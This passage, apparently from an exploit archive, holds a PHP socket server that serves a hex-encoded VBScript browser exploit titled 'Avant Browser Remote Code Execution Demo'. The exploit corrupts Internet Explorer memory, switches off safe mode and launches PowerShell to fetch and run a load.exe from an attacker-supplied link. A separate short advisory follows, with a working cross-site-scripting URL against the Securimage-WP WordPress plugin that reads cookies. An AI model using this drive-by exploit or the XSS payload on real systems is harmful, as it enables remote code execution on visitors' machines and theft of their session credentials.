6C\x69\x63\x61\x74\x69\x6F\x6E\x29\x2E\x53\x68\x65\x6C\x6C\x45\x78\x65\x63\x75\x74\x65\x28\x27\x6C\x6F\x61\x64\x2E\x65\x78\x65\x27\x29\x3B\x22\x0D\x0A\x73\x68\x65\x6C\x6C\x2E\x53\x68\x65\x6C\x6C\x45\x78\x65\x63\x75\x74\x65\x20\x22\x70\x6F\x77\x65\x72\x73\x68\x65\x6C\x6C\x2E\x65\x78\x65\x22\x2C\x20\x22\x2D\x43\x6F\x6D\x6D\x61\x6E\x64\x20\x22\x20\x26\x20\x63\x6F\x6D\x6D\x61\x6E\x64\x2C\x20\x22\x22\x2C\x20\x22\x72\x75\x6E\x61\x73\x22\x2C\x20\x30\x0D\x0A\x65\x6E\x64\x20\x66\x75\x6E\x63\x74\x69\x6F\x6E\x0D\x0A\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E\x0D\x0A\x20\x0D\x0A\x3C\x53\x43\x52\x49\x50\x54\x20\x4C\x41\x4E\x47\x5
5\x41\x47\x45\x3D\x22\x56\x42\x53\x63\x72\x69\x70\x74\x22\x3E\x0D\x0A\x20\x20\x0D\x0A\x64\x69\x6D\x20\x20\x20\x61\x61\x28\x29\x0D\x0A\x64\x69\x6D\x20\x20\x20\x61\x62\x28\x29\x0D\x0A\x64\x69\x6D\x20\x20\x20\x61\x30\x0D\x0A\x64\x69\x6D\x20\x20\x20\x61\x31\x0D\x0A\x64\x69\x6D\x20\x20\x20\x61\x32\x0D\x0A\x64\x69\x6D\x20\x20\x20\x61\x33\x0D\x0A\x64\x69\x6D\x20\x20\x20\x77\x69\x6E\x39\x78\x0D\x0A\x64\x69\x6D\x20\x20\x20\x69\x6E\x74\x56\x65\x72\x73\x69\x6F\x6E\x0D\x0A\x64\x69\x6D\x20\x20\x20\x72\x6E\x64\x61\x0D\x0A\x64\x69\x6D\x20\x20\x20\x66\x75\x6E\x63\x6C\x61\x73\x73\x0D\x0A\x64\x69\x6D\x20\x20\x20\x6D\x79\x61\x72\x72\x61\x79\x0D\x0A\x20\x0D\x0A\x42\x65\x67\x69\x6E\x28\x29\x0D\x0A\x20\x0D\x0A\x66\x75\x6E\x63\x74\x69\x6F\x6E\x20\x42\x65\x67\x69\x6E\x28\x29\x0D\x0A\x20\x20\x4F\x6E\x20\x45\x72\x72\x6F\x72\x20\x52\x65\x73\x75\x6D\x65\x20\x4E\x65\x78\x74\x0D\x0A\x20\x20\x69\x6E\x66\x6F\x3D\x4E\x61\x76\x69\x67\x61\x74\x6F\x72\x2E\x55\x73\x65\x72\x41\x67\x65\x6E\x74\x0D\x0A\x20\x0D\x0A\x20\x20\x69\x66\x28\x69\x6E\x73\x74\x72\x28\x69\x6E\x66\x6F\x2C\x22\x57\x69\x6E\x36\x34\x22\x29\x3E\x30\x29\x20\x20\x20\x74\x68\x65\x6E\x0D\x0A\x20\x20\x20\x20\x20\x65\x78\x69\x74\x20\x20\x20\x66\x75\x6E\x63\x74\x69\x6F\x6E\x0D\x0A\x20\x20\x65\x6E\x64\x20\x69\x66\x0D\x0A\x20\x0D\x0A\x20\x20\x69\x66\x20\x28\x69\x6E\x73\x74\x72\x28\x69\x6E\x66\x6F\x2C\x22\x4D\x53\x49\x45\x22\x29\x3E\x30\x29\x20\x20\x20\x74\x68\x65\x6E\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x6E\x74\x56\x65\x72\x73\x69\x6F\x6E\x20\x3D\x20\x43\x49\x6E\x74\x28\x4D\x69\x64\x28\x69\x6E\x66\x6F\x2C\x20\x49\x6E\x53\x74\x72\x28\x69\x6E\x66\x6F\x2C\x20\x22\x4D\x53\x49\x45\x22\x29\x20\x2B\x20\x35\x2C\x20\x32\x29\x29\x20\x20\x20\x0D\x0A\x20\x20\x65\x6C\x73\x65\x0D\x0A\x20\x20\x20\x20\x20\x65\x78\x69\x74\x20\x20\x20\x66\x75\x6E\x63\x74\x69\x6F\x6E\x20\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0D\x0A\x20\x20\x65\x6E\x64\x20\x69\x66\x0D\x0A\x20\x0D\x0A\x20\x20\x77\x69\x6E\x39\x78\x3D\x30\x0
D\x0A\x20\x0D\x0A\x20\x20\x42\x65\x67\x69\x6E\x49\x6E\x69\x74\x28\x29\x0D\x0A\x20\x20\x49\x66\x20\x43\x72\x65\x61\x74\x65\x28\x29\x3D\x54\x72\x75\x65\x20\x54\x68\x65\x6E\x0D\x0A\x20\x20\x20\x20\x20\x6D\x79\x61\x72\x72\x61\x79\x3D\x20\x20\x20\x20\x20\x20\x20\x20\x63\x68\x72\x77\x28\x30\x31\x29\x26\x63\x68\x72\x77\x28\x32\x31\x37\x36\x29\x26\x63\x68\x72\x77\x28\x30\x31\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x0D\x0A\x20\x20\x20\x20\x20\x6D\x79\x61\x72\x72\x61\x79\x3D\x6D\x79\x61\x72\x72\x61\x79\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68\x72\x77\x28\x33\x32\x37\x36\x37\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68\x72\x77\x28\x30\x29\x0D\x0A\x20\x0D\x0A\x20\x20\x20\x20\x20\x69\x66\x28\x69\x6E\x74\x56\x65\x72\x73\x69\x6F\x6E\x3C\x34\x29\x20\x74\x68\x65\x6E\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x77\x72\x69\x74\x65\x28\x22\x3C\x62\x72\x3E\x20\x49\x45\x22\x29\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x77\x72\x69\x74\x65\x28\x69\x6E\x74\x56\x65\x72\x73\x69\x6F\x6E\x29\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x75\x6E\x73\x68\x65\x6C\x6C\x63\x6F\x64\x65\x28\x29\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x20\x65\x6C\x73\x65\x20\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x65\x74\x6E\x6F\x74\x73\x61\x66\x65\x6D\x6F\x64\x65\x28\x29\x0D\x0A\x20\x20\x20\x20\x20\x65\x6E\x64\x20\x69\x66\x0D\x0A\x20\x20\x65\x6E\x64\x20\x69\x66\x0D\x0A\x65\x6E\x64\x20\x66\x75\x6E\x63\x74\x69\x6F\x6E\x0D\x0A\x20\x0D\x0A\x66\x75\x6E\x63\x74\x69\x6F\x6E\x20\x42\x65\x67\x69\x6E\x49\x6E\x69\x74\x28\x29\x0D\x0A\x20\x20\x20\x52\x61\x6E\x64\x6F\x6D\x69\x7A\x65\x28\x29\x0D\x0A\x20\x20\x20\x72\x65\x64\x69\x6D\x20\x61\x61\x28\x35\x29\x0D\x0A\x20\x20\x20\x72\x65\x64\x69\x6D\x20\x61\x62\x28\x35\x29\x0D\x0
A\x20\x20\x20\x61\x30\x3D\x31\x33\x2B\x31\x37\x2A\x72\x6E\x64\x28\x36\x29\x0D\x0A\x20\x20\x20\x61\x33\x3D\x37\x2B\x33\x2A\x72\x6E\x64\x28\x35\x29\x0D\x0A\x65\x6E\x64\x20\x66\x75\x6E\x63\x74\x69\x6F\x6E\x0D\x0A\x20\x0D\x0A\x66\x75\x6E\x63\x74\x69\x6F\x6E\x20\x43\x72\x65\x61\x74\x65\x28\x29\x0D\x0A\x20\x20\x4F\x6E\x20\x45\x72\x72\x6F\x72\x20\x52\x65\x73\x75\x6D\x65\x20\x4E\x65\x78\x74\x0D\x0A\x20\x20\x64\x69\x6D\x20\x69\x0D\x0A\x20\x20\x43\x72\x65\x61\x74\x65\x3D\x46\x61\x6C\x73\x65\x0D\x0A\x20\x20\x46\x6F\x72\x20\x69\x20\x3D\x20\x30\x20\x54\x6F\x20\x34\x30\x30\x0D\x0A\x20\x20\x20\x20\x49\x66\x20\x4F\x76\x65\x72\x28\x29\x3D\x54\x72\x75\x65\x20\x54\x68\x65\x6E\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x43\x72\x65\x61\x74\x65\x3D\x54\x72\x75\x65\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x45\x78\x69\x74\x20\x46\x6F\x72\x0D\x0A\x20\x20\x20\x20\x45\x6E\x64\x20\x49\x66\x20\x0D\x0A\x20\x20\x4E\x65\x78\x74\x0D\x0A\x65\x6E\x64\x20\x66\x75\x6E\x63\x74\x69\x6F\x6E\x0D\x0A\x20\x0D\x0A\x73\x75\x62\x20\x74\x65\x73\x74\x61\x61\x28\x29\x0D\x0A\x65\x6E\x64\x20\x73\x75\x62\x0D\x0A\x20\x0D\x0A\x66\x75\x6E\x63\x74\x69\x6F\x6E\x20\x6D\x79\x64\x61\x74\x61\x28\x29\x0D\x0A\x20\x20\x20\x20\x4F\x6E\x20\x45\x72\x72\x6F\x72\x20\x52\x65\x73\x75\x6D\x65\x20\x4E\x65\x78\x74\x0D\x0A\x20\x20\x20\x20\x20\x69\x3D\x74\x65\x73\x74\x61\x61\x0D\x0A\x20\x20\x20\x20\x20\x69\x3D\x6E\x75\x6C\x6C\x0D\x0A\x20\x20\x20\x20\x20\x72\x65\x64\x69\x6D\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x32\x29\x20\x20\x0D\x0A\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3D\x30\x0D\x0A\x20\x20\x20\x20\x20\x61\x61\x28\x61\x31\x29\x3D\x69\x0D\x0A\x20\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3D\x36\x2E\x33\x36\x35\x39\x38\x37\x33\x37\x34\x33\x37\x38\x30\x31\x45\x2D\x33\x31\x34\x0D\x0A\x20\x0D\x0A\x20\x20\x20\x20\x20\x61\x61\x28\x61\x31\x2B\x32\x29\x3D\x6D\x79\x61\x72\x72\x61\x79\x0D\x0A\x20\x20\x20\x20\x20\x61\x62\x28\x32\x29\x3D\x31\x2E\x37\x34\x30\x38\x38\x35\x33\x34\x37\x33\x31\x33\x32\x34\x45\x2D\x33\x31\x30\x2
0\x20\x0D\x0A\x20\x20\x20\x20\x20\x6D\x79\x64\x61\x74\x61\x3D\x61\x61\x28\x61\x31\x29\x0D\x0A\x20\x20\x20\x20\x20\x72\x65\x64\x69\x6D\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x20\x20\x0D\x0A\x65\x6E\x64\x20\x66\x75\x6E\x63\x74\x69\x6F\x6E\x20\x0D\x0A\x20\x0D\x0A\x20\x0D\x0A\x66\x75\x6E\x63\x74\x69\x6F\x6E\x20\x73\x65\x74\x6E\x6F\x74\x73\x61\x66\x65\x6D\x6F\x64\x65\x28\x29\x0D\x0A\x20\x20\x20\x20\x4F\x6E\x20\x45\x72\x72\x6F\x72\x20\x52\x65\x73\x75\x6D\x65\x20\x4E\x65\x78\x74\x0D\x0A\x20\x20\x20\x20\x69\x3D\x6D\x79\x64\x61\x74\x61\x28\x29\x20\x20\x0D\x0A\x20\x20\x20\x20\x69\x3D\x72\x75\x6D\x28\x69\x2B\x38\x29\x0D\x0A\x20\x20\x20\x20\x69\x3D\x72\x75\x6D\x28\x69\x2B\x31\x36\x29\x0D\x0A\x20\x20\x20\x20\x6A\x3D\x72\x75\x6D\x28\x69\x2B\x26\x68\x31\x33\x34\x29\x20\x20\x0D\x0A\x20\x20\x20\x20\x66\x6F\x72\x20\x6B\x3D\x30\x20\x74\x6F\x20\x26\x68\x36\x30\x20\x73\x74\x65\x70\x20\x34\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x6A\x3D\x72\x75\x6D\x28\x69\x2B\x26\x68\x31\x32\x30\x2B\x6B\x29\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x28\x6A\x3D\x31\x34\x29\x20\x74\x68\x65\x6E\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6A\x3D\x30\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x64\x69\x6D\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x32\x29\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x20\x61\x61\x28\x61\x31\x2B\x32\x29\x28\x69\x2B\x26\x68\x31\x31\x63\x2B\x6B\x29\x3D\x61\x62\x28\x34\x29\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x64\x69\x6D\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x20\x20\x0D\x0A\x20\x0D\x0A\x20\x20\x20\x20\x20\x6A\x3D\x30\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6A\x3D\x72\x75\x6D\x28\x69\x2B\x26\x68\x31\x32\x30\x2B\x6B\x29\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x2
0\x20\x20\x20\x20\x20\x20\x45\x78\x69\x74\x20\x66\x6F\x72\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6E\x64\x20\x69\x66\x0D\x0A\x20\x0D\x0A\x20\x20\x20\x20\x6E\x65\x78\x74\x20\x0D\x0A\x20\x20\x20\x20\x61\x62\x28\x32\x29\x3D\x31\x2E\x36\x39\x37\x35\x39\x36\x36\x33\x33\x31\x36\x37\x34\x37\x45\x2D\x33\x31\x33\x0D\x0A\x20\x20\x20\x20\x72\x75\x6E\x6D\x75\x6D\x61\x61\x28\x29\x20\x0D\x0A\x65\x6E\x64\x20\x66\x75\x6E\x63\x74\x69\x6F\x6E\x0D\x0A\x20\x0D\x0A\x66\x75\x6E\x63\x74\x69\x6F\x6E\x20\x4F\x76\x65\x72\x28\x29\x0D\x0A\x20\x20\x20\x20\x4F\x6E\x20\x45\x72\x72\x6F\x72\x20\x52\x65\x73\x75\x6D\x65\x20\x4E\x65\x78\x74\x0D\x0A\x20\x20\x20\x20\x64\x69\x6D\x20\x74\x79\x70\x65\x31\x2C\x74\x79\x70\x65\x32\x2C\x74\x79\x70\x65\x33\x0D\x0A\x20\x20\x20\x20\x4F\x76\x65\x72\x3D\x46\x61\x6C\x73\x65\x0D\x0A\x20\x20\x20\x20\x61\x30\x3D\x61\x30\x2B\x61\x33\x0D\x0A\x20\x20\x20\x20\x61\x31\x3D\x61\x30\x2B\x32\x0D\x0A\x20\x20\x20\x20\x61\x32\x3D\x61\x30\x2B\x26\x68\x38\x30\x30\x30\x30\x30\x30\x0D\x0A\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x72\x65\x64\x69\x6D\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x20\x0D\x0A\x20\x20\x20\x20\x72\x65\x64\x69\x6D\x20\x20\x20\x61\x62\x28\x61\x30\x29\x20\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x72\x65\x64\x69\x6D\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x32\x29\x0D\x0A\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x74\x79\x70\x65\x31\x3D\x31\x0D\x0A\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3D\x31\x2E\x31\x32\x33\x34\x35\x36\x37\x38\x39\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x30\x0D\x0A\x20\x20\x20\x20\x61\x61\x28\x61\x30\x29\x3D\x31\x30\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x49\x66\x28\x49\x73\x4F\x62\x6A\x65\x63\x74\x28\x61\x61\x28\x61\x31\x2D\x31\x29\x29\x20\x3D\x20\x46\x61\x6C\x73\x65\x29\x20\x54\x68\x65\x6E\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x69\x66\x28\x69\x6E\x74\x56\x65\x72\x73\x69\x6F\x6E\x3C\x34\x29\x20\x74\x68\x6
5\x6E\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6D\x65\x6D\x3D\x63\x69\x6E\x74\x28\x61\x30\x2B\x31\x29\x2A\x31\x36\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6A\x3D\x76\x61\x72\x74\x79\x70\x65\x28\x61\x61\x28\x61\x31\x2D\x31\x29\x29\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x28\x28\x6A\x3D\x6D\x65\x6D\x2B\x34\x29\x20\x6F\x72\x20\x28\x6A\x2A\x38\x3D\x6D\x65\x6D\x2B\x38\x29\x29\x20\x74\x68\x65\x6E\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x28\x76\x61\x72\x74\x79\x70\x65\x28\x61\x61\x28\x61\x31\x2D\x31\x29\x29\x3C\x3E\x30\x29\x20\x20\x54\x68\x65\x6E\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x49\x66\x28\x49\x73\x4F\x62\x6A\x65\x63\x74\x28\x61\x61\x28\x61\x31\x29\x29\x20\x3D\x20\x46\x61\x6C\x73\x65\x20\x29\x20\x54\x68\x65\x6E\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x74\x79\x70\x65\x31\x3D\x56\x61\x72\x54\x79\x70\x65\x28\x61\x61\x28\x61\x31\x29\x29\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6E\x64\x20\x69\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6E\x64\x20\x69\x66\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6C\x73\x65\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x64\x69\x6D\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x78\x69\x74\x20\x20\x66\x75\x6E\x63\x74\x69\x6F\x6E\x0D\x0A\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6E\x64\x20\x69\x66\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6C\x73\x65\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x28\x76\x61\x72\x74\x79\x70\x65\x28\x61\x61\x28\x61\x31\x2D\x31\x29\x29\x3C\x3E\x30\x29\x2
0\x20\x54\x68\x65\x6E\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x49\x66\x28\x49\x73\x4F\x62\x6A\x65\x63\x74\x28\x61\x61\x28\x61\x31\x29\x29\x20\x3D\x20\x46\x61\x6C\x73\x65\x20\x29\x20\x54\x68\x65\x6E\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x74\x79\x70\x65\x31\x3D\x56\x61\x72\x54\x79\x70\x65\x28\x61\x61\x28\x61\x31\x29\x29\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6E\x64\x20\x69\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6E\x64\x20\x69\x66\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6E\x64\x20\x69\x66\x0D\x0A\x20\x20\x20\x20\x65\x6E\x64\x20\x69\x66\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x49\x66\x28\x74\x79\x70\x65\x31\x3D\x26\x68\x32\x66\x36\x36\x29\x20\x54\x68\x65\x6E\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x4F\x76\x65\x72\x3D\x54\x72\x75\x65\x20\x20\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x45\x6E\x64\x20\x49\x66\x20\x20\x0D\x0A\x20\x20\x20\x20\x49\x66\x28\x74\x79\x70\x65\x31\x3D\x26\x68\x42\x39\x41\x44\x29\x20\x54\x68\x65\x6E\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x4F\x76\x65\x72\x3D\x54\x72\x75\x65\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x77\x69\x6E\x39\x78\x3D\x31\x0D\x0A\x20\x20\x20\x20\x45\x6E\x64\x20\x49\x66\x20\x20\x0D\x0A\x20\x0D\x0A\x20\x20\x20\x20\x72\x65\x64\x69\x6D\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0D\x0A\x65\x6E\x64\x20\x66\x75\x6E\x63\x74\x69\x6F\x6E\x0D\x0A\x20\x0D\x0A\x66\x75\x6E\x63\x74\x69\x6F\x6E\x20\x72\x75\x6D\x28\x61\x64\x64\x29\x20\x0D\x0A\x20\x20\x20\x20\x4F\x6E\x20\x45\x72\x72\x6F\x72\x20\x52\x65\x73\x75\x6D\x65\x20\x4E\x65\x78\x74\x0D\x0A\x20\x20\x20\x20\x72\x65\x64\x69\x6D\x20\x20\x50\x72\x65\x73\x6
5\x72\x76\x65\x20\x61\x61\x28\x61\x32\x29\x20\x20\x0D\x0A\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3D\x30\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x61\x61\x28\x61\x31\x29\x3D\x61\x64\x64\x2B\x34\x20\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3D\x31\x2E\x36\x39\x37\x35\x39\x36\x36\x33\x33\x31\x36\x37\x34\x37\x45\x2D\x33\x31\x33\x20\x20\x20\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x72\x75\x6D\x3D\x6C\x65\x6E\x62\x28\x61\x61\x28\x61\x31\x29\x29\x20\x20\x0D\x0A\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3D\x30\x0D\x0A\x20\x20\x20\x20\x72\x65\x64\x69\x6D\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x0D\x0A\x65\x6E\x64\x20\x66\x75\x6E\x63\x74\x69\x6F\x6E\x0D\x0A\x20\x0D\x0A\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E\x0D\x0A\x20\x3C\x63\x65\x6E\x74\x65\x72\x3E\x0D\x0A\x20\x3C\x73\x74\x72\x6F\x6E\x67\x3E\x41\x76\x61\x6E\x74\x20\x42\x72\x6F\x77\x73\x65\x72\x20\x52\x65\x6D\x6F\x74\x65\x20\x43\x6F\x64\x65\x20\x45\x78\x65\x63\x75\x74\x69\x6F\x6E\x20\x44\x65\x6D\x6F\x3C\x2F\x73\x74\x72\x6F\x6E\x67\x3E\x0D\x0A\x20\x3C\x62\x72\x20\x2F\x3E\x0D\x0A\x20\x3C\x69\x3E\x45\x68\x73\x61\x6E\x20\x4E\x6F\x72\x65\x64\x64\x69\x6E\x69\x20\x2D\x20\x40\x70\x72\x6F\x74\x33\x63\x74\x30\x72\x3C\x69\x3E\x0D\x0A\x20\x3C\x62\x72\x20\x2F\x3E\x3C\x69\x3E\x65\x68\x73\x61\x6E\x6E\x2E\x69\x6E\x66\x6F\x3C\x2F\x69\x3E\x0D\x0A\x20\x3C\x2F\x63\x65\x6E\x74\x65\x72\x3E\x0D\x0A\x3C\x2F\x62\x6F\x64\x79\x3E\x0D\x0A\x3C\x2F\x68\x74\x6D\x6C\x3E";
    # Substitute the download URL into the page template (DOWNLOAD token).
    $msgd=str_replace("DOWNLOAD",$link,$msgd);
    # Accept loop. The request is never read: every TCP connection gets the same
    # 200 text/html response carrying the full page, and $client is never
    # closed, so connections accumulate until the process is killed (the loop
    # has no exit condition).
    for (;;) {
        # '@' suppresses any warning from socket_accept; on failure the loop
        # sleeps 100 ms and retries.
        if ($client = @socket_accept($socket)) {
            socket_write($client, "HTTP/1.1 200 OK\r\n" .
                         "Content-length: " . strlen($msgd) . "\r\n" .
                         "Content-Type: text/html; charset=UTF-8\r\n\r\n" .
                         $msgd);
            print "\n Target Checked Your Link \n";
        }
        else usleep(100000);
    }
     

    ?>
            
source: https://www.securityfocus.com/bid/59816/info

The Securimage-WP plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Securimage-WP 3.2.4 is vulnerable; other versions may also be affected. 

http://www.example.com/wordpress/wp-content/plugins/securimage-wp/siwp_test.php/"/><script>alert(document.cookie);</script>?tested=1